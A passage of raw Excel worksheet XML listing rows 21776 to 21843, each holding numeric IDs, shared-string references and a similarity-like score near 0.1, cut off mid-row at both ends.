        <v>4.4740589E7</v>
      </c>
      <c r="C21776" s="2" t="s">
        <v>21024</v>
      </c>
      <c r="D21776" s="2">
        <v>1.0</v>
      </c>
      <c r="E21776" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21776" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="21777" ht="15.75" customHeight="1">
      <c r="A21777" s="1">
        <v>11131.0</v>
      </c>
      <c r="B21777" s="2">
        <v>1.9120755E7</v>
      </c>
      <c r="C21777" s="2" t="s">
        <v>21025</v>
      </c>
      <c r="D21777" s="2">
        <v>1.0</v>
      </c>
      <c r="E21777" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21777" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="21778" ht="15.75" customHeight="1">
      <c r="A21778" s="1">
        <v>11504.0</v>
      </c>
      <c r="B21778" s="2">
        <v>2.2137492E7</v>
      </c>
      <c r="C21778" s="2" t="s">
        <v>21026</v>
      </c>
      <c r="D21778" s="2">
        <v>1.0</v>
      </c>
      <c r="E21778" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21778" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="21779" ht="15.75" customHeight="1">
      <c r="A21779" s="1">
        <v>12501.0</v>
      </c>
      <c r="B21779" s="2">
        <v>2.9615032E7</v>
      </c>
      <c r="C21779" s="2" t="s">
        <v>21027</v>
      </c>
      <c r="D21779" s="2">
        <v>1.0</v>
      </c>
      <c r="E21779" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21779" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="21780" ht="15.75" customHeight="1">
      <c r="A21780" s="1">
        <v>17733.0</v>
      </c>
      <c r="B21780" s="2">
        <v>5.0672959E7</v>
      </c>
      <c r="C21780" s="2" t="s">
        <v>21028</v>
      </c>
      <c r="D21780" s="2">
        <v>1.0</v>
      </c>
      <c r="E21780" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21780" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="21781" ht="15.75" customHeight="1">
      <c r="A21781" s="1">
        <v>18505.0</v>
      </c>
      <c r="B21781" s="2">
        <v>5.2958583E7</v>
      </c>
      <c r="C21781" s="2" t="s">
        <v>21029</v>
      </c>
      <c r="D21781" s="2">
        <v>1.0</v>
      </c>
      <c r="E21781" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21781" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="21782" ht="15.75" customHeight="1">
      <c r="A21782" s="1">
        <v>21695.0</v>
      </c>
      <c r="B21782" s="2">
        <v>2.5223121E7</v>
      </c>
      <c r="C21782" s="2" t="s">
        <v>21030</v>
      </c>
      <c r="D21782" s="2">
        <v>1.0</v>
      </c>
      <c r="E21782" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21782" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="21783" ht="15.75" customHeight="1">
      <c r="A21783" s="1">
        <v>22614.0</v>
      </c>
      <c r="B21783" s="2">
        <v>3.9977659E7</v>
      </c>
      <c r="C21783" s="2" t="s">
        <v>21031</v>
      </c>
      <c r="D21783" s="2">
        <v>1.0</v>
      </c>
      <c r="E21783" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21783" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="21784" ht="15.75" customHeight="1">
      <c r="A21784" s="1">
        <v>15832.0</v>
      </c>
      <c r="B21784" s="2">
        <v>4.4331116E7</v>
      </c>
      <c r="C21784" s="2" t="s">
        <v>21032</v>
      </c>
      <c r="D21784" s="2">
        <v>1.0</v>
      </c>
      <c r="E21784" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21784" s="2">
        <v>0.1005747126436782</v>
      </c>
    </row>
    <row r="21785" ht="15.75" customHeight="1">
      <c r="A21785" s="1">
        <v>9051.0</v>
      </c>
      <c r="B21785" s="2">
        <v>5.506327E7</v>
      </c>
      <c r="C21785" s="2" t="s">
        <v>21033</v>
      </c>
      <c r="D21785" s="2">
        <v>1.0</v>
      </c>
      <c r="E21785" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21785" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="21786" ht="15.75" customHeight="1">
      <c r="A21786" s="1">
        <v>20274.0</v>
      </c>
      <c r="B21786" s="2">
        <v>1.1134595E7</v>
      </c>
      <c r="C21786" s="2" t="s">
        <v>21034</v>
      </c>
      <c r="D21786" s="2">
        <v>1.0</v>
      </c>
      <c r="E21786" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21786" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="21787" ht="15.75" customHeight="1">
      <c r="A21787" s="1">
        <v>29769.0</v>
      </c>
      <c r="B21787" s="2">
        <v>3.4884281E7</v>
      </c>
      <c r="C21787" s="2" t="s">
        <v>21035</v>
      </c>
      <c r="D21787" s="2">
        <v>1.0</v>
      </c>
      <c r="E21787" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21787" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="21788" ht="15.75" customHeight="1">
      <c r="A21788" s="1">
        <v>6411.0</v>
      </c>
      <c r="B21788" s="2">
        <v>4.8533076E7</v>
      </c>
      <c r="C21788" s="2" t="s">
        <v>21036</v>
      </c>
      <c r="D21788" s="2">
        <v>1.0</v>
      </c>
      <c r="E21788" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21788" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="21789" ht="15.75" customHeight="1">
      <c r="A21789" s="1">
        <v>9410.0</v>
      </c>
      <c r="B21789" s="2">
        <v>5.5774865E7</v>
      </c>
      <c r="C21789" s="2" t="s">
        <v>21037</v>
      </c>
      <c r="D21789" s="2">
        <v>1.0</v>
      </c>
      <c r="E21789" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21789" s="2">
        <v>0.09979423868312756</v>
      </c>
    </row>
    <row r="21790" ht="15.75" customHeight="1">
      <c r="A21790" s="1">
        <v>9542.0</v>
      </c>
      <c r="B21790" s="2">
        <v>5.6023499E7</v>
      </c>
      <c r="C21790" s="2" t="s">
        <v>21038</v>
      </c>
      <c r="D21790" s="2">
        <v>1.0</v>
      </c>
      <c r="E21790" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21790" s="2">
        <v>0.09979423868312756</v>
      </c>
    </row>
    <row r="21791" ht="15.75" customHeight="1">
      <c r="A21791" s="1">
        <v>8215.0</v>
      </c>
      <c r="B21791" s="2">
        <v>5.3324715E7</v>
      </c>
      <c r="C21791" s="2" t="s">
        <v>21039</v>
      </c>
      <c r="D21791" s="2">
        <v>1.0</v>
      </c>
      <c r="E21791" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21791" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="21792" ht="15.75" customHeight="1">
      <c r="A21792" s="1">
        <v>11721.0</v>
      </c>
      <c r="B21792" s="2">
        <v>2.3849402E7</v>
      </c>
      <c r="C21792" s="5" t="s">
        <v>21040</v>
      </c>
      <c r="D21792" s="2">
        <v>1.0</v>
      </c>
      <c r="E21792" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21792" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="21793" ht="15.75" customHeight="1">
      <c r="A21793" s="1">
        <v>12798.0</v>
      </c>
      <c r="B21793" s="2">
        <v>3.1415314E7</v>
      </c>
      <c r="C21793" s="2" t="s">
        <v>21041</v>
      </c>
      <c r="D21793" s="2">
        <v>1.0</v>
      </c>
      <c r="E21793" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21793" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="21794" ht="15.75" customHeight="1">
      <c r="A21794" s="1">
        <v>17615.0</v>
      </c>
      <c r="B21794" s="2">
        <v>5.0360815E7</v>
      </c>
      <c r="C21794" s="2" t="s">
        <v>21042</v>
      </c>
      <c r="D21794" s="2">
        <v>1.0</v>
      </c>
      <c r="E21794" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21794" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="21795" ht="15.75" customHeight="1">
      <c r="A21795" s="1">
        <v>29062.0</v>
      </c>
      <c r="B21795" s="2">
        <v>3.0256309E7</v>
      </c>
      <c r="C21795" s="2" t="s">
        <v>21043</v>
      </c>
      <c r="D21795" s="2">
        <v>1.0</v>
      </c>
      <c r="E21795" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21795" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="21796" ht="15.75" customHeight="1">
      <c r="A21796" s="1">
        <v>33501.0</v>
      </c>
      <c r="B21796" s="2">
        <v>8060654.0</v>
      </c>
      <c r="C21796" s="2" t="s">
        <v>21044</v>
      </c>
      <c r="D21796" s="2">
        <v>1.0</v>
      </c>
      <c r="E21796" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21796" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="21797" ht="15.75" customHeight="1">
      <c r="A21797" s="1">
        <v>3657.0</v>
      </c>
      <c r="B21797" s="2">
        <v>3.9331434E7</v>
      </c>
      <c r="C21797" s="2" t="s">
        <v>21045</v>
      </c>
      <c r="D21797" s="2">
        <v>1.0</v>
      </c>
      <c r="E21797" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21797" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="21798" ht="15.75" customHeight="1">
      <c r="A21798" s="1">
        <v>10450.0</v>
      </c>
      <c r="B21798" s="2">
        <v>1.0575485E7</v>
      </c>
      <c r="C21798" s="2" t="s">
        <v>21046</v>
      </c>
      <c r="D21798" s="2">
        <v>1.0</v>
      </c>
      <c r="E21798" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21798" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="21799" ht="15.75" customHeight="1">
      <c r="A21799" s="1">
        <v>26153.0</v>
      </c>
      <c r="B21799" s="2">
        <v>1.6082723E7</v>
      </c>
      <c r="C21799" s="2" t="s">
        <v>21047</v>
      </c>
      <c r="D21799" s="2">
        <v>1.0</v>
      </c>
      <c r="E21799" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21799" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="21800" ht="15.75" customHeight="1">
      <c r="A21800" s="1">
        <v>81.0</v>
      </c>
      <c r="B21800" s="2">
        <v>1.189661E7</v>
      </c>
      <c r="C21800" s="2" t="s">
        <v>21048</v>
      </c>
      <c r="D21800" s="2">
        <v>1.0</v>
      </c>
      <c r="E21800" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21800" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21801" ht="15.75" customHeight="1">
      <c r="A21801" s="1">
        <v>90.0</v>
      </c>
      <c r="B21801" s="2">
        <v>1.2028456E7</v>
      </c>
      <c r="C21801" s="2" t="s">
        <v>21049</v>
      </c>
      <c r="D21801" s="2">
        <v>1.0</v>
      </c>
      <c r="E21801" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21801" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21802" ht="15.75" customHeight="1">
      <c r="A21802" s="1">
        <v>286.0</v>
      </c>
      <c r="B21802" s="2">
        <v>1.546151E7</v>
      </c>
      <c r="C21802" s="2" t="s">
        <v>21050</v>
      </c>
      <c r="D21802" s="2">
        <v>1.0</v>
      </c>
      <c r="E21802" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21802" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21803" ht="15.75" customHeight="1">
      <c r="A21803" s="1">
        <v>390.0</v>
      </c>
      <c r="B21803" s="2">
        <v>1.6470795E7</v>
      </c>
      <c r="C21803" s="2" t="s">
        <v>21051</v>
      </c>
      <c r="D21803" s="2">
        <v>1.0</v>
      </c>
      <c r="E21803" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21803" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21804" ht="15.75" customHeight="1">
      <c r="A21804" s="1">
        <v>420.0</v>
      </c>
      <c r="B21804" s="2">
        <v>1.6818142E7</v>
      </c>
      <c r="C21804" s="2" t="s">
        <v>21052</v>
      </c>
      <c r="D21804" s="2">
        <v>1.0</v>
      </c>
      <c r="E21804" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21804" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21805" ht="15.75" customHeight="1">
      <c r="A21805" s="1">
        <v>487.0</v>
      </c>
      <c r="B21805" s="2">
        <v>1.7546116E7</v>
      </c>
      <c r="C21805" s="2" t="s">
        <v>21053</v>
      </c>
      <c r="D21805" s="2">
        <v>1.0</v>
      </c>
      <c r="E21805" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21805" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21806" ht="15.75" customHeight="1">
      <c r="A21806" s="1">
        <v>493.0</v>
      </c>
      <c r="B21806" s="2">
        <v>1.7663786E7</v>
      </c>
      <c r="C21806" s="2" t="s">
        <v>21054</v>
      </c>
      <c r="D21806" s="2">
        <v>1.0</v>
      </c>
      <c r="E21806" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21806" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21807" ht="15.75" customHeight="1">
      <c r="A21807" s="1">
        <v>589.0</v>
      </c>
      <c r="B21807" s="2">
        <v>1.9170689E7</v>
      </c>
      <c r="C21807" s="2" t="s">
        <v>21055</v>
      </c>
      <c r="D21807" s="2">
        <v>1.0</v>
      </c>
      <c r="E21807" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21807" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21808" ht="15.75" customHeight="1">
      <c r="A21808" s="1">
        <v>763.0</v>
      </c>
      <c r="B21808" s="2">
        <v>2.1024468E7</v>
      </c>
      <c r="C21808" s="2" t="s">
        <v>21056</v>
      </c>
      <c r="D21808" s="2">
        <v>1.0</v>
      </c>
      <c r="E21808" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21808" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21809" ht="15.75" customHeight="1">
      <c r="A21809" s="1">
        <v>919.0</v>
      </c>
      <c r="B21809" s="2">
        <v>2.2271455E7</v>
      </c>
      <c r="C21809" s="2" t="s">
        <v>21057</v>
      </c>
      <c r="D21809" s="2">
        <v>1.0</v>
      </c>
      <c r="E21809" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21809" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21810" ht="15.75" customHeight="1">
      <c r="A21810" s="1">
        <v>935.0</v>
      </c>
      <c r="B21810" s="2">
        <v>2.2384603E7</v>
      </c>
      <c r="C21810" s="2" t="s">
        <v>21058</v>
      </c>
      <c r="D21810" s="2">
        <v>1.0</v>
      </c>
      <c r="E21810" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21810" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21811" ht="15.75" customHeight="1">
      <c r="A21811" s="1">
        <v>1095.0</v>
      </c>
      <c r="B21811" s="2">
        <v>2.3783244E7</v>
      </c>
      <c r="C21811" s="2" t="s">
        <v>21057</v>
      </c>
      <c r="D21811" s="2">
        <v>1.0</v>
      </c>
      <c r="E21811" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21811" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21812" ht="15.75" customHeight="1">
      <c r="A21812" s="1">
        <v>1125.0</v>
      </c>
      <c r="B21812" s="2">
        <v>2.4167153E7</v>
      </c>
      <c r="C21812" s="2" t="s">
        <v>21059</v>
      </c>
      <c r="D21812" s="2">
        <v>1.0</v>
      </c>
      <c r="E21812" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21812" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21813" ht="15.75" customHeight="1">
      <c r="A21813" s="1">
        <v>1166.0</v>
      </c>
      <c r="B21813" s="2">
        <v>2.4531881E7</v>
      </c>
      <c r="C21813" s="2" t="s">
        <v>21060</v>
      </c>
      <c r="D21813" s="2">
        <v>1.0</v>
      </c>
      <c r="E21813" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21813" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21814" ht="15.75" customHeight="1">
      <c r="A21814" s="1">
        <v>1172.0</v>
      </c>
      <c r="B21814" s="2">
        <v>2.4608817E7</v>
      </c>
      <c r="C21814" s="2" t="s">
        <v>21061</v>
      </c>
      <c r="D21814" s="2">
        <v>1.0</v>
      </c>
      <c r="E21814" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21814" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21815" ht="15.75" customHeight="1">
      <c r="A21815" s="1">
        <v>1386.0</v>
      </c>
      <c r="B21815" s="2">
        <v>2.6136414E7</v>
      </c>
      <c r="C21815" s="2" t="s">
        <v>21062</v>
      </c>
      <c r="D21815" s="2">
        <v>1.0</v>
      </c>
      <c r="E21815" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21815" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21816" ht="15.75" customHeight="1">
      <c r="A21816" s="1">
        <v>1398.0</v>
      </c>
      <c r="B21816" s="2">
        <v>2.628277E7</v>
      </c>
      <c r="C21816" s="2" t="s">
        <v>21063</v>
      </c>
      <c r="D21816" s="2">
        <v>1.0</v>
      </c>
      <c r="E21816" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21816" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21817" ht="15.75" customHeight="1">
      <c r="A21817" s="1">
        <v>1471.0</v>
      </c>
      <c r="B21817" s="2">
        <v>2.6978356E7</v>
      </c>
      <c r="C21817" s="2" t="s">
        <v>21064</v>
      </c>
      <c r="D21817" s="2">
        <v>1.0</v>
      </c>
      <c r="E21817" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21817" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21818" ht="15.75" customHeight="1">
      <c r="A21818" s="1">
        <v>1495.0</v>
      </c>
      <c r="B21818" s="2">
        <v>2.7217587E7</v>
      </c>
      <c r="C21818" s="2" t="s">
        <v>21065</v>
      </c>
      <c r="D21818" s="2">
        <v>1.0</v>
      </c>
      <c r="E21818" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21818" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21819" ht="15.75" customHeight="1">
      <c r="A21819" s="1">
        <v>1615.0</v>
      </c>
      <c r="B21819" s="2">
        <v>2.7820211E7</v>
      </c>
      <c r="C21819" s="2" t="s">
        <v>21066</v>
      </c>
      <c r="D21819" s="2">
        <v>1.0</v>
      </c>
      <c r="E21819" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21819" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21820" ht="15.75" customHeight="1">
      <c r="A21820" s="1">
        <v>1961.0</v>
      </c>
      <c r="B21820" s="2">
        <v>3.0319601E7</v>
      </c>
      <c r="C21820" s="2" t="s">
        <v>21067</v>
      </c>
      <c r="D21820" s="2">
        <v>1.0</v>
      </c>
      <c r="E21820" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21820" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21821" ht="15.75" customHeight="1">
      <c r="A21821" s="1">
        <v>2055.0</v>
      </c>
      <c r="B21821" s="2">
        <v>3.0977876E7</v>
      </c>
      <c r="C21821" s="2" t="s">
        <v>21068</v>
      </c>
      <c r="D21821" s="2">
        <v>1.0</v>
      </c>
      <c r="E21821" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21821" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21822" ht="15.75" customHeight="1">
      <c r="A21822" s="1">
        <v>2107.0</v>
      </c>
      <c r="B21822" s="2">
        <v>3.1339273E7</v>
      </c>
      <c r="C21822" s="2" t="s">
        <v>21069</v>
      </c>
      <c r="D21822" s="2">
        <v>1.0</v>
      </c>
      <c r="E21822" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21822" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21823" ht="15.75" customHeight="1">
      <c r="A21823" s="1">
        <v>2156.0</v>
      </c>
      <c r="B21823" s="2">
        <v>3.1697502E7</v>
      </c>
      <c r="C21823" s="2" t="s">
        <v>21070</v>
      </c>
      <c r="D21823" s="2">
        <v>1.0</v>
      </c>
      <c r="E21823" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21823" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21824" ht="15.75" customHeight="1">
      <c r="A21824" s="1">
        <v>2304.0</v>
      </c>
      <c r="B21824" s="2">
        <v>3.2724569E7</v>
      </c>
      <c r="C21824" s="2" t="s">
        <v>21071</v>
      </c>
      <c r="D21824" s="2">
        <v>1.0</v>
      </c>
      <c r="E21824" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21824" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21825" ht="15.75" customHeight="1">
      <c r="A21825" s="1">
        <v>2391.0</v>
      </c>
      <c r="B21825" s="2">
        <v>3.3343314E7</v>
      </c>
      <c r="C21825" s="2" t="s">
        <v>21072</v>
      </c>
      <c r="D21825" s="2">
        <v>1.0</v>
      </c>
      <c r="E21825" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21825" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21826" ht="15.75" customHeight="1">
      <c r="A21826" s="1">
        <v>3072.0</v>
      </c>
      <c r="B21826" s="2">
        <v>3.6528518E7</v>
      </c>
      <c r="C21826" s="2" t="s">
        <v>21073</v>
      </c>
      <c r="D21826" s="2">
        <v>1.0</v>
      </c>
      <c r="E21826" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21826" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21827" ht="15.75" customHeight="1">
      <c r="A21827" s="1">
        <v>3530.0</v>
      </c>
      <c r="B21827" s="2">
        <v>3.864171E7</v>
      </c>
      <c r="C21827" s="2" t="s">
        <v>21074</v>
      </c>
      <c r="D21827" s="2">
        <v>1.0</v>
      </c>
      <c r="E21827" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21827" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21828" ht="15.75" customHeight="1">
      <c r="A21828" s="1">
        <v>3660.0</v>
      </c>
      <c r="B21828" s="2">
        <v>3.9342055E7</v>
      </c>
      <c r="C21828" s="2" t="s">
        <v>21075</v>
      </c>
      <c r="D21828" s="2">
        <v>1.0</v>
      </c>
      <c r="E21828" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21828" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21829" ht="15.75" customHeight="1">
      <c r="A21829" s="1">
        <v>3794.0</v>
      </c>
      <c r="B21829" s="2">
        <v>3.9958765E7</v>
      </c>
      <c r="C21829" s="2" t="s">
        <v>21076</v>
      </c>
      <c r="D21829" s="2">
        <v>1.0</v>
      </c>
      <c r="E21829" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21829" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21830" ht="15.75" customHeight="1">
      <c r="A21830" s="1">
        <v>4117.0</v>
      </c>
      <c r="B21830" s="2">
        <v>4.1354792E7</v>
      </c>
      <c r="C21830" s="2" t="s">
        <v>21077</v>
      </c>
      <c r="D21830" s="2">
        <v>1.0</v>
      </c>
      <c r="E21830" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21830" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21831" ht="15.75" customHeight="1">
      <c r="A21831" s="1">
        <v>4130.0</v>
      </c>
      <c r="B21831" s="2">
        <v>4.1385095E7</v>
      </c>
      <c r="C21831" s="2" t="s">
        <v>21078</v>
      </c>
      <c r="D21831" s="2">
        <v>1.0</v>
      </c>
      <c r="E21831" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21831" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21832" ht="15.75" customHeight="1">
      <c r="A21832" s="1">
        <v>4471.0</v>
      </c>
      <c r="B21832" s="2">
        <v>4.2470112E7</v>
      </c>
      <c r="C21832" s="2" t="s">
        <v>21079</v>
      </c>
      <c r="D21832" s="2">
        <v>1.0</v>
      </c>
      <c r="E21832" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21832" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21833" ht="15.75" customHeight="1">
      <c r="A21833" s="1">
        <v>4593.0</v>
      </c>
      <c r="B21833" s="2">
        <v>4.28034E7</v>
      </c>
      <c r="C21833" s="2" t="s">
        <v>21080</v>
      </c>
      <c r="D21833" s="2">
        <v>1.0</v>
      </c>
      <c r="E21833" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21833" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21834" ht="15.75" customHeight="1">
      <c r="A21834" s="1">
        <v>4959.0</v>
      </c>
      <c r="B21834" s="2">
        <v>4.4076742E7</v>
      </c>
      <c r="C21834" s="2" t="s">
        <v>21081</v>
      </c>
      <c r="D21834" s="2">
        <v>1.0</v>
      </c>
      <c r="E21834" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21834" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21835" ht="15.75" customHeight="1">
      <c r="A21835" s="1">
        <v>5086.0</v>
      </c>
      <c r="B21835" s="2">
        <v>4.448193E7</v>
      </c>
      <c r="C21835" s="2" t="s">
        <v>21082</v>
      </c>
      <c r="D21835" s="2">
        <v>1.0</v>
      </c>
      <c r="E21835" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21835" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21836" ht="15.75" customHeight="1">
      <c r="A21836" s="1">
        <v>5130.0</v>
      </c>
      <c r="B21836" s="2">
        <v>4.4620622E7</v>
      </c>
      <c r="C21836" s="2" t="s">
        <v>21083</v>
      </c>
      <c r="D21836" s="2">
        <v>1.0</v>
      </c>
      <c r="E21836" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21836" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21837" ht="15.75" customHeight="1">
      <c r="A21837" s="1">
        <v>5223.0</v>
      </c>
      <c r="B21837" s="2">
        <v>4.4967878E7</v>
      </c>
      <c r="C21837" s="2" t="s">
        <v>21084</v>
      </c>
      <c r="D21837" s="2">
        <v>1.0</v>
      </c>
      <c r="E21837" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21837" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21838" ht="15.75" customHeight="1">
      <c r="A21838" s="1">
        <v>5307.0</v>
      </c>
      <c r="B21838" s="2">
        <v>4.5266572E7</v>
      </c>
      <c r="C21838" s="2" t="s">
        <v>21085</v>
      </c>
      <c r="D21838" s="2">
        <v>1.0</v>
      </c>
      <c r="E21838" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21838" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21839" ht="15.75" customHeight="1">
      <c r="A21839" s="1">
        <v>5343.0</v>
      </c>
      <c r="B21839" s="2">
        <v>4.5330182E7</v>
      </c>
      <c r="C21839" s="2" t="s">
        <v>21086</v>
      </c>
      <c r="D21839" s="2">
        <v>1.0</v>
      </c>
      <c r="E21839" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21839" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21840" ht="15.75" customHeight="1">
      <c r="A21840" s="1">
        <v>5362.0</v>
      </c>
      <c r="B21840" s="2">
        <v>4.5375392E7</v>
      </c>
      <c r="C21840" s="2" t="s">
        <v>21087</v>
      </c>
      <c r="D21840" s="2">
        <v>1.0</v>
      </c>
      <c r="E21840" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21840" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21841" ht="15.75" customHeight="1">
      <c r="A21841" s="1">
        <v>5460.0</v>
      </c>
      <c r="B21841" s="2">
        <v>4.5659874E7</v>
      </c>
      <c r="C21841" s="2" t="s">
        <v>21088</v>
      </c>
      <c r="D21841" s="2">
        <v>1.0</v>
      </c>
      <c r="E21841" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21841" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21842" ht="15.75" customHeight="1">
      <c r="A21842" s="1">
        <v>5573.0</v>
      </c>
      <c r="B21842" s="2">
        <v>4.6025293E7</v>
      </c>
      <c r="C21842" s="2" t="s">
        <v>21089</v>
      </c>
      <c r="D21842" s="2">
        <v>1.0</v>
      </c>
      <c r="E21842" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21842" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="21843" ht="15.75" customHeight="1">
      <c r="A21843" s="1">
        <v>5985.0</v>
      </c>
      <c r="B21843" s="2">
